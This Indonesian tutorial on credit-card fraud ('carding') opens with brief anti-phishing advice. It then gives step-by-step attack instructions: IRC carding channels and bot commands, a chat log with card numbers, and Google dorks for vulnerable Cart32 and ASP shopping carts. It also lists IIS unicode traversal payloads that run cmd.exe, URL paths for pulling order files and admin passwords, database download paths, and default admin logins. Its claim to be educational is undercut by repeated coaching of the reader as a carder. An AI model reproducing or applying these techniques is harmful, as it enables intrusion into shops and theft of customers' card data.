Biasanya bank, hanya akan meminta data customer pada saat melakukan verifikasi untuk menyetujui sebuah kartu kredit. Bank juga tidak pernah meminta data customer dikarenakan perubahan sistem. Sistem perbankan jauh lebih modern ketimbang menelepon setiap nasabahnya untuk melakukan perubahan data.
Jangan percaya kepada pihak lain, selain bank tempat Anda mendaftar kartu kredit. Misalnya dari asuransi, saham dan sebagainya. Walaupun ada dari bank yang sama misalnya dari bank AAA, tapi yang bagian Asuransi Kredit, ketahuilah mereka tidak akan meminta data Anda. Jika mereka melakukannya berhati-hatilah dan patut dicurigai. Bahkan karyawan bank pun bisa jadi tergoda untuk mencoba-coba menipu Anda sekedar untuk mengorek data finansial Anda, jadi jangan pernah mengungkapkan data finansial Anda terutama hanya lewat pembicaraan telepon ataupun email.
Biasanya bank akan meminta data seperti di atas apabila Anda yang menelepon kepada pihak Bank untuk memastikan bahwa itu benar customer yang asli. Bukannya pihak Bank yang menelepon customer.
Sebisa mungkin Anda tolak dengan cara halus. Biasanya bank akan memahami jika ada customer yang keberatan untuk menyebutkan nomor kartu kreditnya. Saya juga pernah melihat pesan berikut pada sebuah kartu kredit.
----------------------------------------------------------------------------------------
Demi keamanan kartu kredit Anda, jangan pernah menyerahkan kartu kredit Anda kepada pihak yang mengaku MEWAKILI pihak bank atau badan keuangan lain, dengan alasan apapun.
----------------------------------------------------------------------------------------
PHISING.
Saya yakin, Anda membaca dan membuka-buka artikel dalam situs ini karena ingin mendapatkan teknik melakukan carding melalui internet, ya, kan? Ayo ngaku aja, he...he...he...
Padahal saya menulis artikel ini agar semua orang tahu bagaimana sepak terjang para carder dalam mencari uang melalui jalan haram. Saya ingin semua orang tahu agar mereka semua tidak mudah ditipu oleh orang-orang macam kalian. (Jangan marah ya! Seperti semua ilmu pengetahuan di dunia ini, semuanya kembali kepada orang yang bersangkutan, mau dipakai apa ilmu yang didapatnya apakah untuk kebaikan atau justru akan disalahgunakan untuk kejahatan!).
Saya memang sengaja mengulur-ulur waktu supaya Anda tambah penasaran.
Kasus phising yang paling terkenal adalah kasus situs BCA dan update data email Ebay beberapa tahun yang lalu, dimana sang pelaku memanfaatkan kesalahan manusia yang kalau-kalau salah ketik. Misalnya, nama situs asli bank BCA adalah www.klikbca.com , yang kemudian sang korban salah ketik menjadi www.kilkbca.com , atau www.clickbca.com atau juga www.klikbca.co.id dan masih banyak lagi kemungkinan variasi lainnya.
Salah ketik satu huruf saja akibatnya bisa berabe. Efek dari phising tersebut bukan cuma bisa tahu nomor kartu kredit, malahan lebih dari itu. Sebab banyak yang menyimpan nomor kartu kredit seseorang di dalamnya, jika account user berhasil diambil oleh pelaku phising. Belum lagi kalau dia mentransfer sejumlah uang. Untung BCA sekarang sudah menggunakan Key BCA yang boleh dibilang "lebih aman", jadi orang tidak bisa sembarangan melakukan transaksi. Bank lainnya yang menggunakan key yang saya tahu adalah BNI. Dalam hal ini kita ngomongin yang ada di Indonesia saja.
Dari tadi kita sudah berpanjang lebar cerita kasus phising, tapi saya lupa ngasih tahu artinya. Phising adalah singkatan dari Password Harvesting Fishing. Artinya tindakan penipuan dengan menggunakan email palsu atau situs palsu yang bertujuan untuk mengelabui user sehingga pelaku bisa mendapatkan data user tersebut.
Tindakan penipuan berupa sebuah email yang seolah-olah berasal dari sebuah perusahaan resmi. Misalnya sebuah bank fiktif untuk mendapatkan data-data pribadi seseorang, baik berupa PIN, nomor rekening, nomor kartu kredit dan sebagainya. Yang paling sering adalah para penjahat yang berpura-pura mengaku-ngaku sebagai karyawan Customer Service dari CitiBank. Dapat diduga para pelakunya adalah orang-orang Amerika, Jerman, Eropa Timur ataupun Afrika, karena email tersebut biasanya berbahasa Inggris.
Pelaku Phising ini dikenal dengan sebutan Phiser. Katakanlah seorang phiser mengirimkan email kepada 1000 orang korban dengan dalih update informasi data konsumen. Dan jika hanya 5% saja yang merespon maka phiser telah berhasil mendapatkan data dari 50 orang. Mengapa ini bisa terjadi, karena Phiser juga berdalih, apabila tidak dilakukan perubahan data maka account user akan dihapus sehingga tidak bisa digunakan lagi. Tentunya akan ada user yang merasa takut, lalu mengikuti saran yang disampaikan. Sebab dalam kebanyakan kasus phising teknik yang digunakan adalah perubahan data, termasuk di dalamnya, password, dan nomor kartu kredit. Jadi berhati-hatilah. Boleh dibilang tindakan ini mirip dengan social engineering.
SCAM PAGE (HALAMAN SITUS PALSU).
Berhubung saya membahas mengenai Phising, sekalian saja saya tambahkan secuil informasi yang hampir mirip dengan kasus phising. Teknik ini adalah cara yang dilakukan carder untuk mendapatkan informasi kartu kredit dengan cara membuat sebuah halaman situs konfirmasi palsu yang lebih dikenal dengan julukan SCAM PAGE.
Contohnya adalah Yahoo Wallet yang diberikan oleh Yahoo untuk pengadaan kartu kredit. Jadi apabila user berbelanja dengan situs Yahoo maka proses verifikasinya hanya sedikit saja, misalnya cukup dengan memasukkan CVV kartu kredit yang dimiliki user.
Biasanya carder akan bertindak seolah-olah administrator Yahoo, lalu menyampaikan pesan kepada user dengan alasan perubahan data. Untuk melakukannya, klik pada link yang sudah disediakan. Apabila seseorang mengklik link yang dimaksud, user bukannya dibawa menuju ke situs resmi Yahoo, melainkan ke sebuah area registrasi yang mirip dengan kepunyaan Yahoo.
Apabila user yang telah tertipu tersebut memasukkan data, dan mengklik submit, maka data tersebut akan dikirimkan kepada email carder, bukannya masuk ke dalam database Yahoo.
Berikut ini adalah contoh sebuah halaman scam page www.aol-customerservice.com yang dulu pernah ada.
Jika dilihat teknik seperti ini cukup rumit, sehingga carder yang memahami pemrograman web yang bisa membuat halaman palsu registry seperti itu. Walau demikian, scam page sangat berbahaya hasilnya karena bisa dibuat untuk memperoleh semua informasi detail dari user. Dan bisa juga diterapkan untuk banyak hal "perampokan" data lainnya.
SECURITY TIPS
Hal yang paling sederhana dan perlu Anda lakukan adalah mengecek dengan benar nama situs yang Anda buka. Jika Anda menerima email dari bank, sebaiknya Anda memeriksa keabsahan email tersebut apakah benar dari bank atau bukan. Sebisa mungkin segera hubungi bank tersebut, apakah email yang dimaksud benar atau tidak.
Sepengetahuan saya, bank tidak pernah meminta nasabahnya untuk melakukan update data apalagi melalui email. Kalau toh memang ada, biasanya Anda diminta menghubungi pihak bank dengan nomor yang jelas. Jadi, Anda jangan sampai memberikan data-data pribadi apalagi data-data keuangan seperti nomor kartu kredit secara sembarangan. Hal ini telah disampaikan secara resmi oleh Visa pada http://corporate.visa.com/ut/fraud.jsp
"Visa will never send you an email asking for confidential information such as account numbers, passwords, PIN numbers, credit card numbers or social security numbers."
Jangan lupa untuk memeriksa kegiatan transaksi perbankan Anda. Supaya tindakan pencegahan dan pengobatan bisa segera ditangani. Berhubung, kebanyakan email yang digunakan adalah spam maka Anda wajib memfilter email yang masuk.
Jika bisa, Anda dapat memeriksa sertifikat digital situs tersebut. Selain dengan memeriksa sertifikat digital sebuah situs, pada situs resmi, yang memiliki logo VeriSign Secure Site. Pastilah Anda bisa memeriksa keabsahannya, karena memiliki tombol dengan pesan Click to verify.
Intinya adalah, kita harus selalu berhati-hati. Apalagi saat ini aktivitas phising terus meningkat setiap harinya. Bahkan situs yang ngakunya aman, belum tentu aman 100%.
CHATTING
Sebenarnya ini hanyalah sebuah aktivitas chatting biasa saja. Hanya saja di sini ada beberapa channel yang biasanya adalah sebuah komunitas yang membicarakan tema carding. Cara seperti ini pula yang digunakan untuk memperoleh nomor kartu kredit tanpa perlu repot-repot. Cukup dengan masuk ke dalam channel khusus tersebut maka seseorang akan bisa memperoleh nomor kartu kredit dengan mudah. Ada banyak channel, hanya saja disini saya berikan beberapa saja yang pernah saya ketahui:
#ccposts
#thecc
#thacc
#cvv
#cc
#ccs
#cchome
#cvv2
Anda dapat mengunjungi channel-channel tersebut melalui server IRC umum yang banyak digunakan oleh orang, diantaranya DALnet, UnderNet dan Efnet.
Data dan nomor mengenai kartu kredit itu bisa diminta (request) dengan gratis pada channel-channel tersebut.
Dalam channel tersebut bisa juga menggunakan command (perintah) tertentu untuk mendukung aktivitas carding.
Command: !cc digunakan untuk merequest (meminta) nomor kartu kredit.
Command: !chk digunakan untuk mengecek valid tidaknya nomor yang diperoleh. Contoh:
!chk1111222233335555
Command !cvv2 digunakan untuk mendapatkan CVV dari nomor kartu kredit yang dimiliki.
Command !order.log digunakan untuk data dari nomor kartu kredit. Seperti, nama alamat dan sebagainya.
Command !proxy digunakan untuk mengetahui nomor port dan proxy yang bisa digunakan untuk menyembunyikan diri.
Di samping itu pula, untuk mendapatkan nomor kartu kredit bisa dilakukan dengan cara trade atau orang umumnya menyebutnya "barter". Penukaran tersebut bisa berupa apa saja, baik sesama nomor kartu kredit. Bisa pula objek-objek lainnya, misalnya adalah shell account, root, bnc, psybnc, domain, password, dan proxy.
Sebenarnya, saya tidak begitu tertarik dengan pembahasan chatting ini, sebab saya sendiri jarang sekali melakukan aktivitas chatting ini. Jadi saya beri sedikit cuplikan saja.
#ccposts
**Now talking in #ccposts
** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] Also Idle In
#Dont.whois.me.b***h and get Aop | 0/ v Verify First| /server xdirc.d2g.com -> Free BNC:/server portatech.net 21500 xdirc'
** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dalnet For Checking CC'S? Try X-Niates 5.01 --
http://mi5.ausgamers.com/xns501.exe (win ME untested & 24 Valid CC's Included) !cvv2
5437000105070603 !commands
** Quits: MIHUTESCU (~mihut@80.97.26.67)
(Client closed connection) Er0sake',<> is Master > cvv2 : -> 074 <-, by: SL[at]TkiS, #DaCc -listen2rap- SL[a]TkiS's command list is as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2ccNumber _ _=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip, #DaCc =_ <@^Enhance^> << <> >> ? <>><>
* I have cc number and I need cc msg me for trade !chk 3732 1694 2923 0058
CART 32
Kali ini saya akan mengulas teknik carding pada salah satu aplikasi belanja yang sering digunakan internet yaitu cart32. Ini sebenarnya adalah teknik carding yang sudah umum.
Ada beberapa syntax yang boleh Anda coba sendiri yang mungkin Anda sukai. Ingat langkah-langkah seperti ini memerlukan bantuan Google Hacking. Caranya masuk saja ke www.google.com , kemudian pada kolom search ketiklah syntax berikut:
allinurl: cgi-bin/cart32.exe
atau
cgis/cart32.exe
allinurl:/cart32.exe/
Secara pribadi saya lebih menyukai syntax yang terakhir yaitu: allinurl:/cart32.exe/
Harap diperhatikan sewaktu Anda melakukan searching di google.com sebab bisa saja model yang Anda peroleh berbeda teksnya. Atau malah versi cart yang berbeda seperti Cart32v3.2 atau yang lainnya.
Potonglah website tersebut menjadi seperti contoh berikut atau berakhiran dengan kata-kata cart32.exe.
http://www.situs-target.com/partybows/cgi-bin/cart32.exe/
Tambahkan kata error pada akhirnya. Jadi, secara lengkap dapat ditulis menjadi:
http://www.situs-target.com/partybows/cgi-bin/cart32.exe/error
Kode lain yang bisa Anda gunakan adalah expdate.
Copy link yang telah Anda modifikasi tersebut pada URL browser Anda, dan jalankan.
Apabila yang muncul adalah halaman error maka beruntunglah Anda. Karena tujuan kita memang untuk melihat yang error-error. Hanya saja, di sini ada dua jenis error, ada error yang berguna dan ada juga yang tidak berguna. Berikut adalah halaman error yang tidak berguna. Jadi Anda cari website lainnya saja, biar gampang.
Sedangkan halaman error yang kita cari adalah yang memberikan informasi lebih lengkap. Contohnya adalah yang berisikan informasi CGI.
Dari informasi tersebut, carilah bagian Page Setup and Directory, pada beberapa kasus namanya adalah Cart32 Setup Info and Directory. Pada bagian tersebut, carilah file yang memiliki ekstensi *.32.
Misalnya, di sini saya menemukan beberapa diantaranya adalah:
CABLE-010018.c32
CABLE-010019.c32
CABLE-010020.c32
CABLE-010021.c32
CABLE-010022.c32
CABLE-010023.c32
CABLE-010024.c32
CABLE-010025.c32
CABLE-010026.c32
CABLE-010027.c32
CABLE-010028.c32
Aksi berikutnya adalah merubah bentuk URL.
http://www.situs-target.com/partybows/cgi-bin/cart32.exe/error
Dengan menghapus error dan juga .exe, maka URLnya menjadi:
http://www.situs-target.com/partybows/cgi-bin/cart32
Masukkanlah nama file *.32 yang Anda temukan pada akhir URL menjadi:
http://www.situs-target.com/partybows/cgi-bin/cart32/nama-file.32
Contohnya:
http://www.situs-target.com/partybows/cgi-bin/cart32/CABLE-010018.c32
Berikut ini adalah petunjuk lainnya dengan model yang berbeda. Caranya hampir sama dengan yang sebelumnya.
http://www.situs-target.com/scr i pts/cart32.exe/folder-lainnya
Ubah URL tersebut menjadi:
http://www.situs-target.com/scr i pts/
Di belakang scr i pt akan kita beri beberapa unicode. Maka bentuknya menjadi:
http://www.situs-target.com/scr i pts/
Berikut daftar unicode yang bisa Anda selipkan untuk dijajal.
Untuk URL dengan yang terdapat path/scr i pts/ :
/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%c0%af../winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%255c..%255cwinnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c dir c:\
Sedangkan untuk URL yang terdapat path/cgi-bin/unicode yang digunakan adalah:
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c dir c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c dir c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c dir c:\
Sebagai contoh, untuk path /scr i pts/ gantilah menjadi:
http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\
String dir c:\ tujuannya adalah untuk me-list direktori c server situs-target.
Sekarang untuk menuju direktori cc ganti unicodenya menjadi:
http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\progra~1\mwainc\cart32\
Sekarang output list dari file .32, misalnya saja namanya adalah WRBURNS-001065.c32
http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
Berhubung semua ini memerlukan kesabaran. Seandainya tidak berhasil, mau tidak mau Anda harus mencoba menggunakan unicode lainnya.
Sekarang, kita akan melakukan sebuah manuver lain dalam memanipulasi Cart32. Cari di google situs target yang memiliki atau menggunakan Cart32.exe. Misalkan, di sini saya memperoleh target dengan nama http://www.situs-target.com
Pura-puralah Anda berbelanja dengan membeli satu item. Setelah berbelanja, secara otomatis nama website tersebut akan berubah menjadi:
https://www.cart32hosting.com/situs-target/cgi-bin/cart32.exe/DONS-AddItem
Perlu saya tambahkan bahwa mungkin saja situs cart32hosting.com akan berbeda namanya pada situs target lainnya. Begitu juga pada akhir link. Gantilah akhiran pada URL dengan kata error jadinya adalah:
https://www.cart32hosting.com/situs-target/cgi-bin/cart32.exe/error
Pesan kesalahan akan muncul, bentuk dan modelnya, kemungkinan juga berbeda.
Pada kesempatan ini, saya akan mengajarkan cara menculik password adminnya. Caranya hanya dengan mengubah cart32.exe menjadi cart32.ini.
https://www.cart32hosting.com/bugsandbuggies/cgi-bin/cart32.ini
Sekarang Anda tinggal mendownload file ini.
Password dalam file tersebut masih dalam keadaan terenkripsi. Untuk mengenkripsinya, Anda dapat menggunakan Cart32decoder. Sorry banget, saya tidak akan membahas caranya.
Sebagai bahan percobaan untuk Anda, berikut adalah beberapa direktori yang memiliki vulnerability tepatnya Exploitable Directories.
/scr i pts/cart32.ini
/scr i pts/cart32.exe
/scr i pts/cart32.exe/cart32clientlist
/scr i pts/c32web.exe/ChangeAdminPassword
/scr i pts/c32web.exe
cgi-shl/c32web.exe/
Berikut saya akan menjelaskan beberapa eksploit yang menarik dan layak untuk Anda coba. Misalnya dengan menggunakan syntax:
cart32.exe v3
Setelah Anda menemukan target, sebagai bekal bagi Anda, berikut ini adalah beberapa versi Cart32.exe yang perlu Anda perhatikan, apakah memiliki vulnerability atau tidak.
v2.5 Sangat bisa
v3.0 Ya, Lumayan
v3.5a Ya, Lumayan bisa
v4.0 Sayang sekali tidak bisa
Sebenarnya, Anda juga bisa menemukan link:
http://www.situs-target.com/cgi-bin/cart32.exe/terserah-ada-apa-saja-????
Biar cepat, langsung saja saya tampilkan teknik eksploitnya:
Untuk mendapatkan nomor kartu kredit:
http://www.situs-target.com/cgi-bin/cart32/apa-saja-ORDERS.txt
atau
http://www.whatever.com/cgi-bin/cart32/apa-saja-OUTPUT.txt
Untuk mendapatkan Password Admin.
http://www.situs-target.com/cgi-bin/cart32.ini
Untuk mendapatkan Password Klien.
http://www.situs-target.com/cgi-bin/cart32.exe/cart32clientlist
Untuk menampilkan Direktori Komputer
http://www.situs-target.com/cgi-bin/cart32.exe/error
Setelah berhasil mendapatkan nomor kartu kredit, biasanya carder akan kembali lagi minggu depan atau bulan depannya untuk mendapatkan lagi file orders.txt dengan data terbaru. Begitulah caranya.
CARDING IN DATABASE
Carding-in database memiliki dua makna.
Yang pertama adalah "Cardingin Database".
Sedangkan yang kedua bisa berarti "Carding in (dalam) database".
Mulai saat ini dan seterusnya, Anda akan menemukan teknik carding yang ternyata bisa dilakukan dengan begitu sederhana. Anda tidak perlu mengerti proses enkripsi mencuri password terlebih dahulu untuk bisa masuk ke sebuah situs. Dalam bab ini Anda akan mempelajari beberapa teknik yang langsung mengakses database.
Berikut ini saya berikan sebuah teknik yang bisa digunakan untuk proses carding. Anda tidak memerlukan tools, untuk melakukan hal ini. Hanya bermodalkan sebuah browser, dan membuka situs Google.
Vsproducts.mdb
Sebenarnya kalau boleh dibilang teknik ini sudah lama dan kuno. Tapi, sampai saat ini masih banyak yang bisa dicardingin. Semua itu tergantung dari kreativitas Anda.
File database yang akan dicolong adalah vsproducts.md. File ini merupakan bawaan template shopping cart ASP yang diterapkan pada sistem Microsoft Frontpage. Bagi Anda yang beruntung juga bisa menemukan nomor kartu kredit yang tidak dienkripsi. Sebab enkripsi itu sendiri bersifat optional, jadi tidak bawaan langsung, sehingga bisa langsung tampil.
Kode untuk menghubungkan database dengan file database yang digunakan adalah sebagai berikut:
sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=<%=server.mappath("vsproducts.mdb")%>;"
Sebenarnya, situs yang menerapkan model seperti ini, memiliki file test (percobaan):
http://www.situs-target.com/fpdb/test.asp
Saya harap dari penjelasan ini, pikiran negatif Anda sudah bisa bangun. Jadi, apabila Anda tidak menemukan file vsproducts.mdb langsung dari hasil searching namun menemukan link seperti di atas, patut Anda curigai. Sebab kemungkinan besar mengandung file vsproducts.mdb.
Biasanya, pesan yang muncul saat melakukan test tersebut adalah:
sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;"
Apabila file yang Anda jalankan adalah:
db_con_open.asp maka pesan yang muncul adalah:
<% DIM sDSN sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=C:\web\database\vsproducts.mdb;" %>
Cukup sedikit saja teorinya, kita segera saja membahas poin berikutnya. Pada bagian query Google Anda masukkan syntax:
allinurl:proddetail.asp?prod=
Sekarang Anda buka hasil searching Google tersebut, satu per satu.
Misalnya, nama situs target yang saya peroleh adalah
http://www.situs-target.com/store/proddetail.asp?prod=10001G
Saya ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
Efek sampingnya adalah Anda bisa mendownload file database secara langsung :).
Dari kota dialog download tersebut klik tombol Save untuk menyimpan file database yang Anda dapatkan.
Dalam kotak dialog Save As simpan file tersebut dengan mengklik kembali tombol Save.
Tunggulah proses download dilakukan sampai selesai. Setelah selesai, klik tombol Open untuk membuka dengan aplikasi MS.Access.
Perhatikan pada hasil target yang Anda peroleh, tampak bahwa data kartu kredit ada pada tabel Orders. Tiap hasil yang Anda peroleh bisa berbeda antara situs yang satu dengan situs yang lain.
Selain itu, kita juga akan memperoleh nama administrator beserta passwordnya pada bagian Admin.
Nah, Anda sudah mendapatkan satu database pertama.
Sebagai tambahan untuk penjelasan bagian ini, saya harap Anda bisa mempermainkan folder atau directory yang terdapat di dalamnya. Masalah mempermainkan folder ini termasuk dalam bagian ilmu Google Hacking atau Google Dorks. Pada kesempatan ini cukup saya jelaskan sekilas saja.
Misalnya Anda mendapat target:
http://www.situs-target.com/store/proddetail.asp?prod=10001G
Ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
http://www.situs-target.com/fpdb/vsproducts.mdb
http://www.situs-target.com/store/vsproducts.mdb
http://www.situs-target.com/vsproducts.mdb
Tujuannya adalah untuk menemukan dimana letak file database disembunyikan.
Proses kreatif lainnya yang perlu Anda pahami adalah mengira-ngira nama file yang mirip. Hal ini sengaja saya jelaskan pada bagian awal. Sebab, jika nanti-nanti Anda sedang mencoba beraksi ternyata tidak berhasil, maka Anda harus memahami bagian ini, karena saya tidak akan menjelaskan lagi pada bagian berikutnya.
Contohnya begini, saya ambil dari kasus di atas, nama file database-nya adalah: vsproducts.mdb. Kira-kira yang mirip adalah file vsproduct.mdb (tanpa huruf s). Atau mungkin saja vspproducts.mdb, vspproduct.mdb, pokoknya pintar-pintar Anda-lah.
Walaupun hal ini kelihatannya sepele, sebenarnya dari banyak kejadian yang saya temukan banyak yang berhasil. Hal ini terjadi karena untuk mengamankan sebuah sistem, sering nama file database disamarkan, dan biasanya pula namanya hampir mirip-mirip. Contoh lainnya, ada tulisan orders, ada juga order. Bahkan beberapa kasus bersifat case sensitive, jadi apabila Anda mengetikkan Credit Card akan dianggap berbeda dibanding mengetikkan credit card.
Itulah dua poin penting yang perlu Anda pahami, supaya hasil target Anda menjadi lebih banyak. Tentu saja semua itu butuh kesabaran dan kreativitas. Sebagai bonus dari saya untuk bagian ini, adalah berikut halaman loginnya:
http://www.situs-target.com/vsadmin/admin.asp
dengan account dan password default adalah mystore dan changeme.
Seandainya Anda tidak bisa masuk dengan password default, Anda tetap masih bisa masuk menggunakan account dan password dan file database yang Anda peroleh. :)
Shopping.mdb
Salah satu file database yang paling terkenal adalah shopping.mdb. Nama file database ini yang dibuat menggunakan MS.Access, biasanya juga terhubung dengan ASP. Berikut adalah teknik untuk mendapatkan file database tersebut yang berisikan data customer.
Seperti biasa, gunakan Google untuk mencari targetnya. Langkah detilnya sudah saya jelaskan pada bagian mencari database yang pertama, jadi saya tidak akan mengulang-ulang lagi. Maka saya hanya akan menyebutkan syntax-nya saja untuk bagian berikutnya.
Syntax: inurl:shopping.mdb
Dari link hasil searching, saya hanya perlu mendownload file databasenya. Isinya bukan hanya data kartu kredit baik customer maupun orders. Ada juga password user dan administrator di dalamnya.
Proses download bisa berbeda pada tiap orang, terutama bila menggunakan aplikasi software internet download manager yang cukup beragam dalam mendownload file database.
Saya tidak mau berpanjanglebar menjelaskan masalah teknik dan nama file secara spesifik. Saya lebih tertarik untuk mengajarkan konsepnya. Sebab dengan cara seperti itu, Anda bisa mengembangkan sendiri teknik yang diperlukan. Mengapa hal ini saya tekankan, karena nama file database bisa saja berbeda-beda. Tergantung dari nama pembuat filenya dan juga demi alasan keamanan. Sebenarnya, jika Anda mau sedikit usaha, Anda bisa memodifikasi syntax: inurl:shopping.mdb , menjadi bentuk lainnya. Dalam hal ini, saya mencoba mengubahnya menjadi:
Shopping350.mdb, shopping400.mdb, dan shopping450.mdb.
Bahkan juga ada shopping.mdb, yang berupa nama file database adalah nama situs itu sendiri. Ternyata banyak juga hasil searching yang memuaskan untuk menjadi bahan latihan carding. Ini penting bagi calon ahli webmaster yang mungkin suatu saat berminat bekerja sebagai webmaster atau penjaga keamanan situs belanja di internet.
Eipc.mdb
File database eipc.mdb adalah file default dari ProductCart. Biasanya, file ini disimpan dalam direktori productcart/database/eipc.mdb. Ada juga dari file tersebut yang mengalami proteksi password. Untuk mencari situs yang memakai sistem database ini gunakan syntax berikut untuk mencarinya di google.com
Syntax: allinurl:productcart/database/EIPC.mdb
Expire.mdb
Kalau diterjemahkan secara kasar maka expire.mdb berarti tanggal berakhirnya sebuah kartu kredit. Walau sebenarnya maksudnya bukan itu, tapi nyatanya itu tetap berhubungan dengan carding. Bingung bukan?
Sebenarnya, ini adalah file default dari CatalogIntegrator Cart; yang merupakan aplikasi e-commerce yang dijual pertama kali oleh pihak Adobe System. Aplikasi ini lebih bersifat customer friendly, dan mudah digunakan sehingga cukup banyak pihak yang tertarik untuk menggunakannya.
Syntax: inurl:expire.mdb
Sebagai tambahan saja, pada kebanyakan kasus password default untuk admin yang menggunakan expire.mdb adalah demo, dengan nama account admin adalah: admin
Halaman loginnya:
http://www.situs-target.com/Catalog/Admin/admin.asp
Perhatikan dengan benar huruf besar kecilnya pada URL supaya tidak terjadi error.
Lokasi file expire.mdb itu sendiri bisa Anda perhatikan secara cermat.
Apalagi jika seseorang bisa masuk, maka dia akan dapat melihat berbagai order pembelian dan tentu saja nomor kartu kredit terdapat di dalamnya. Tapi, saya rasa dengan mendapatkan file database-nya saja sudah cukup kok.
Products.mdb
Sebenarnya ini adalah nama file database yang cukup umum digunakan. Oleh karena ini milik umum maka isinya bisa saja bermacam-macam. Ada yang menampilkan nama produk saja dalam database. Ada pula yang menampilkan daftar order termasuk nomor kartu kredit pada konsumen.
Namun, jangan ragu jangan takut, banyak juga kok yang berisikan data konsumen. Tapi ada pula beberapa yang tidak menyertai nomor kartu kredit.
Ha...ha...ha...apa Anda bingung bacanya. Makanya lebih enakan filenya Anda download sendiri yang banyak biar jelas.
Syntax: inurl:products.mdb
Billing.mdb
File database billing.mdb ini menyimpan data kartu kredit dalam tabel Payments. Supaya lebih enak, mendingan Anda buka semua tabel dari hasil download yang Anda dapatkan. Sebab data kartu kredit tidak hanya disimpan dalam tabel Credit Cards, Orders, dan Customers. Karena bisa saja dimanipulasi oleh pembuat database, misalnya nama tabel Time (waktu), tapi isinya malah nomor kartu kredit. Dan hal ini berlaku bagi semua file database dalam buku ini. Makanya jangan cepat menyerah, tetap semangat untuk memperoleh pengalaman dan pengetahuan baru mengenai network security ini.
Shop.mdb
Berikut adalah jenis database lainnya yang sering digunakan untuk aktivitas carding. Shop.mdb, jika diterjemahkan berarti database toko, tentu saja isinya bisa komplit termasuk kartu kredit customer.
Syntax: inurl:shop.mdb
Setiap file shop.mdb yang saya temukan selalu berupa form. Jika mau, Anda juga bisa membuka dalam bentuk tabel.
Exploitshop.mdb
Dalam kesempatan ini saya tidak akan banyak berbicara mengenai exploit. Mengapa hal ini saya batasi, sebab kebanyakan exploit adalah teknik kuno yang sudah basi sehingga tidak banyak digunakan lagi. Beberapa exploit yang saya bahas dalam artikel ini, tujuan sebenarnya hanyalah untuk memberikan cara lain sebagai bentuk variasi, paling tidak untuk memberikan wawasan dan pengetahuan baru bagi Anda, terutama para calon webmaster. Dan selain itu juga sekaligus untuk membuka mata Anda supaya tahu bahwa tidak semuanya bisa langsung dengan cara mendownload database maupun file log. Masih dengan nama database yang sama, yaitu shop.mdb. Hanya saja model syntax dan teknik yang dilakukan berbeda.
Syntax: inurl:mall/lobby.asp
Dari situs target yang Anda temukan saat searching di Google, bukalah URL yang ditampilkan oleh Google. Biasanya, nama URL-nya adalah:
http://www.situs-target.com/mall/lobby.asp
Yang harus Anda lakukan adalah mengubah string
mall/lobby.asp
menjadi
fpdb/shop.mdb
Sehingga secara lengkap akan menjadi:
http://www.situs-target.com/fpdb/shop.mdb
Selanjutnya, Anda tinggal mendownload file databasenya. Data mengenai kartu kredit tersimpan pada bagian Payments (pembayaran).
Store.mdb
File database store.mdb ini adalah nama lain dari shop, juga nama lain untuk products. Walau demikian, file store.mdb ini menyimpan cukup banyak nomor kartu kredit. Dan biasanya disimpan dalam tabel Carthead.
Syntax: inurl:store.mdb
Mystore.mdb
Setelah menggunakan syntax store.mdb, berikut ini adalah model lainnya, yaitu: mystore.mdb. File database mystore.mdb ini banyak digunakan pada aplikasi shopping cart FPcartPal. Sistem ini menangani kartu kredit yang lebih aman. Sebab mereka menggunakan PayPal. Paypal adalah salah satu alat pembayaran elektronik di internet.
Syntax: inurl:mystore.mdb
Jujur saja, database ini tidaklah berisi nomor kartu kredit, sebab saya hanya ingin menunjukkan pada Anda bagaimana memodifikasi sebuah syntax. Dalam hal ini, dari store.mdb menjadi mystore.mdb. Sebenarnya, berhubungan dengan file mystore.mdb pada sistem yang sama terdapat sebuah file laporan yaitu reports.mdb. Isinya adalah laporang tentang transaksi, nggak ada kartu kreditnya. Tapi para carder biasanya memanfaatkan untuk hal lainnya. Sebab siapa tahu saja, barangkali ada file database reports.mdb yang menyimpan data kartu kredit karena bukan bagian dari produk FpcartPal, begitu pula untuk mystore.mdb.
Order.mdb
Saya rasa Anda sudah mengenal dengan jelas order.mdb yang berarti file database pemesanan. Berarti setiap pesanan akan disimpan dalam database yang satu ini. Tentu saja untuk berbelanja salah satu sarananya adalah untuk menggunakan kartu kredit.
Syntax: inurl:order.mdb
Cart.mdb
Ini dia kata-kata yang sering digunakan dalam online shop. Semua barang belanjaan di internet akan dimasukkan ke dalam cart (keranjang). Nah, seseorang bisa saja memanfaatkannya untuk melakukan aktivitas carding.
Syntax: inurl:cart.mdb
